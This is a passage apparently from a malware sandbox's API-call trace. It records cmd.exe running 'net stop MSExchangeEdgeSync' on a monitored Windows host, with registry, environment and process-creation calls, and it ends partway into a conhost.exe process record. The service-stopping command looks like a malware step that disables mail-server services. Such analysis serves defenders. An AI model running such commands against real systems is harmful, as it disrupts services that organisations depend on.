ulOptions=0x0, samDesired=0x2000000, phkResult=0x48eed94 | out: phkResult=0x48eed94*=0x94) returned 0x0 [0135.565] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x48eed98, lpData=0x48eeda0, lpcbData=0x48eed9c*=0x1000 | out: lpType=0x48eed98*=0x0, lpData=0x48eeda0*=0xc0, lpcbData=0x48eed9c*=0x1000) returned 0x2 [0135.566] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x48eed98, lpData=0x48eeda0, lpcbData=0x48eed9c*=0x1000 | out: lpType=0x48eed98*=0x4, lpData=0x48eeda0*=0x1, lpcbData=0x48eed9c*=0x4) returned 0x0 [0135.566] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x48eed98, lpData=0x48eeda0, lpcbData=0x48eed9c*=0x1000 | out: lpType=0x48eed98*=0x0, lpData=0x48eeda0*=0x1, lpcbData=0x48eed9c*=0x1000) returned 0x2 [0135.566] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x48eed98, lpData=0x48eeda0, lpcbData=0x48eed9c*=0x1000 | out: lpType=0x48eed98*=0x4, lpData=0x48eeda0*=0x0, lpcbData=0x48eed9c*=0x4) returned 0x0 [0135.566] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x48eed98, lpData=0x48eeda0, lpcbData=0x48eed9c*=0x1000 | out: lpType=0x48eed98*=0x4, lpData=0x48eeda0*=0x40, lpcbData=0x48eed9c*=0x4) returned 0x0 [0135.566] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x48eed98, lpData=0x48eeda0, lpcbData=0x48eed9c*=0x1000 | out: lpType=0x48eed98*=0x4, lpData=0x48eeda0*=0x40, lpcbData=0x48eed9c*=0x4) returned 0x0 [0135.566] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x48eed98, lpData=0x48eeda0, lpcbData=0x48eed9c*=0x1000 | out: lpType=0x48eed98*=0x0, lpData=0x48eeda0*=0x40, lpcbData=0x48eed9c*=0x1000) returned 0x2 [0135.566] RegCloseKey (hKey=0x94) returned 0x0 [0135.566] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x48eed94 | out: phkResult=0x48eed94*=0x94) returned 0x0 [0135.566] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x48eed98, lpData=0x48eeda0, lpcbData=0x48eed9c*=0x1000 | out: lpType=0x48eed98*=0x0, lpData=0x48eeda0*=0x40, lpcbData=0x48eed9c*=0x1000) returned 0x2 [0135.566] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x48eed98, lpData=0x48eeda0, lpcbData=0x48eed9c*=0x1000 | out: lpType=0x48eed98*=0x4, lpData=0x48eeda0*=0x1, lpcbData=0x48eed9c*=0x4) returned 0x0 [0135.566] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x48eed98, lpData=0x48eeda0, lpcbData=0x48eed9c*=0x1000 | out: lpType=0x48eed98*=0x0, lpData=0x48eeda0*=0x1, lpcbData=0x48eed9c*=0x1000) returned 0x2 [0135.566] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x48eed98, lpData=0x48eeda0, lpcbData=0x48eed9c*=0x1000 | out: lpType=0x48eed98*=0x4, lpData=0x48eeda0*=0x0, lpcbData=0x48eed9c*=0x4) returned 0x0 [0135.566] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x48eed98, lpData=0x48eeda0, lpcbData=0x48eed9c*=0x1000 | out: lpType=0x48eed98*=0x4, lpData=0x48eeda0*=0x9, lpcbData=0x48eed9c*=0x4) returned 0x0 [0135.566] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x48eed98, lpData=0x48eeda0, lpcbData=0x48eed9c*=0x1000 | out: lpType=0x48eed98*=0x4, lpData=0x48eeda0*=0x9, lpcbData=0x48eed9c*=0x4) returned 0x0 [0135.566] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x48eed98, lpData=0x48eeda0, lpcbData=0x48eed9c*=0x1000 | out: lpType=0x48eed98*=0x0, lpData=0x48eeda0*=0x9, lpcbData=0x48eed9c*=0x1000) returned 0x2 [0135.566] RegCloseKey (hKey=0x94) returned 0x0 [0135.566] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29838 [0135.566] srand (_Seed=0x5ad29838) [0135.566] GetCommandLineW () returned="/c net stop MSExchangeEdgeSync" [0135.566] GetCommandLineW () returned="/c net stop MSExchangeEdgeSync" [0135.566] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0135.566] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c59cc8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0135.566] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0135.566] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.566] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.566] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0135.566] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0135.566] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0135.566] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0135.566] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0135.566] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0135.566] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0135.566] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0135.567] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0135.567] GetEnvironmentStringsW () returned 0x4c57d70* [0135.567] FreeEnvironmentStringsA (penv="A") returned 1 [0135.567] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.567] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.567] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0135.567] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0135.567] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0135.567] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0135.567] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0135.567] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0135.567] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0135.567] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0135.567] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x48efb6c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0135.567] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x48efb6c, lpFilePart=0x48efb64 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x48efb64*="Desktop") returned 0x1d [0135.567] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0135.567] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x48ef8e8 | out: lpFindFileData=0x48ef8e8) returned 0x4c505c8 [0135.567] FindClose (in: hFindFile=0x4c505c8 | out: hFindFile=0x4c505c8) returned 1 [0135.568] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x48ef8e8 | out: lpFindFileData=0x48ef8e8) returned 0x4c505c8 [0135.568] FindClose (in: hFindFile=0x4c505c8 | out: hFindFile=0x4c505c8) returned 1 [0135.568] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0135.568] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x48ef8e8 | out: lpFindFileData=0x48ef8e8) returned 0x4c505c8 [0135.568] FindClose (in: hFindFile=0x4c505c8 | out: hFindFile=0x4c505c8) returned 1 [0135.568] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0135.568] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0135.568] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0135.568] GetEnvironmentStringsW () returned 0x4c57d70* [0135.568] FreeEnvironmentStringsA (penv="=") returned 1 [0135.568] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0135.568] GetConsoleOutputCP () returned 0x1b5 [0135.569] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0135.569] GetUserDefaultLCID () returned 0x409 [0135.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0135.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x48efc9c, cchData=128 | out: lpLCData="0") returned 2 [0135.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x48efc9c, cchData=128 | out: lpLCData="0") returned 2 [0135.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x48efc9c, cchData=128 | out: lpLCData="1") returned 2 [0135.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0135.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0135.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0135.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0135.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0135.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0135.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0135.569] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0135.569] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0135.569] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0135.569] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0135.570] GetConsoleTitleW (in: lpConsoleTitle=0x4c5a9f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.570] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0135.570] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0135.570] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0135.570] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0135.571] _wcsicmp (_String1="net", _String2=")") returned 69 [0135.571] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0135.571] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0135.571] _wcsicmp (_String1="IF", _String2="net") returned -5 [0135.571] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0135.571] _wcsicmp (_String1="REM", _String2="net") returned 4 [0135.571] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0135.571] GetConsoleTitleW (in: lpConsoleTitle=0x48ef988, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.572] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0135.572] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0135.572] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0135.572] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0135.572] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0135.572] _wcsicmp (_String1="net", _String2="CD") returned 11 [0135.572] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0135.572] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0135.572] _wcsicmp (_String1="net", _String2="REN") returned -4 [0135.572] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0135.572] _wcsicmp (_String1="net", _String2="SET") returned -5 [0135.572] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0135.572] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0135.572] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0135.572] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0135.572] _wcsicmp (_String1="net", _String2="MD") returned 1 [0135.572] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0135.572] _wcsicmp (_String1="net", _String2="RD") returned -4 [0135.572] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0135.572] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0135.572] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0135.572] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0135.572] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0135.572] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0135.572] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0135.572] _wcsicmp (_String1="net", _String2="VER") returned -8 [0135.572] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0135.572] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0135.572] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0135.572] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0135.572] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0135.572] _wcsicmp (_String1="net", _String2="START") returned -5 [0135.572] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0135.572] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0135.572] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0135.572] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0135.572] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0135.572] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0135.572] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0135.572] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0135.572] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0135.573] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0135.573] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0135.573] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0135.573] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0135.573] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0135.573] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0135.573] _wcsicmp (_String1="net", _String2="CD") returned 11 [0135.573] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0135.573] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0135.573] _wcsicmp (_String1="net", _String2="REN") returned -4 [0135.573] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0135.573] _wcsicmp (_String1="net", _String2="SET") returned -5 [0135.573] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0135.573] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0135.573] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0135.573] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0135.573] _wcsicmp (_String1="net", _String2="MD") returned 1 [0135.573] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0135.573] _wcsicmp (_String1="net", _String2="RD") returned -4 [0135.573] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0135.573] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0135.573] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0135.573] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0135.573] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0135.573] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0135.573] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0135.573] _wcsicmp (_String1="net", _String2="VER") returned -8 [0135.573] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0135.573] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0135.573] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0135.573] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0135.573] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0135.573] _wcsicmp (_String1="net", _String2="START") returned -5 [0135.573] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0135.573] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0135.573] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0135.573] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0135.573] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0135.573] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0135.573] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0135.573] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0135.573] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0135.573] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0135.573] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0135.573] _wcsicmp (_String1="net", _String2="IF") returned 5 [0135.573] _wcsicmp (_String1="net", _String2="REM") returned -4 [0135.573] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0135.574] SetErrorMode (uMode=0x0) returned 0x0 [0135.574] SetErrorMode (uMode=0x1) returned 0x0 [0135.574] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4c505d0, lpFilePart=0x48ef494 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x48ef494*="Desktop") returned 0x1d [0135.574] SetErrorMode (uMode=0x0) returned 0x1 [0135.574] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0135.574] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0135.582] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0135.582] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0135.582] GetConsoleTitleW (in: lpConsoleTitle=0x48ef714, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.582] InitializeProcThreadAttributeList (in: lpAttributeList=0x48ef640, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x48ef624 | out: lpAttributeList=0x48ef640, lpSize=0x48ef624) returned 1 [0135.582] UpdateProcThreadAttribute (in: lpAttributeList=0x48ef640, dwFlags=0x0, Attribute=0x60001, lpValue=0x48ef62c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x48ef640, lpPreviousValue=0x0) returned 1 [0135.582] GetStartupInfoW (in: lpStartupInfo=0x48ef678 | out: lpStartupInfo=0x48ef678*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0135.583] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0135.583] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0135.583] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0135.583] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0135.583] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0135.583] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0135.583] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0135.583] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0135.583] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0135.583] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0135.583] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0135.584] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeEdgeSync", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x48ef5c8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeEdgeSync", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x48ef614 | out: lpCommandLine="net stop MSExchangeEdgeSync", lpProcessInformation=0x48ef614*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xe28, dwThreadId=0xe6c)) returned 1 [0135.590] CloseHandle (hObject=0xa4) returned 1 [0135.590] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0135.590] GetEnvironmentStringsW () returned 0x4c59ed8* [0135.590] FreeEnvironmentStringsA (penv="=") returned 1 [0135.590] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0135.712] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x48ef5ac | out: lpExitCode=0x48ef5ac*=0x2) returned 1 [0135.712] CloseHandle (hObject=0xa8) returned 1 [0135.712] _vsnwprintf (in: _Buffer=0x48ef694, _BufferCount=0x13, _Format="%08X", _ArgList=0x48ef5b4 | out: _Buffer="00000002") returned 8 [0135.712] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0135.712] GetEnvironmentStringsW () returned 0x4c57d70* [0135.712] FreeEnvironmentStringsA (penv="=") returned 1 [0135.712] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0135.712] GetEnvironmentStringsW () returned 0x4c57d70* [0135.713] FreeEnvironmentStringsA (penv="=") returned 1 [0135.713] DeleteProcThreadAttributeList (in: lpAttributeList=0x48ef640 | out: lpAttributeList=0x48ef640) [0135.713] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.713] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0135.713] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.713] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0135.713] _get_osfhandle (_FileHandle=0) returned 0x38 [0135.713] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0135.713] SetConsoleInputExeNameW () returned 0x1 [0135.713] GetConsoleOutputCP () returned 0x1b5 [0135.713] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0135.713] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.714] exit (_Code=2) Thread: id = 608 os_tid = 0xe90 Process: id = "194" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x294d0000" os_pid = "0xe9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "193" os_parent_pid = "0x420" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT 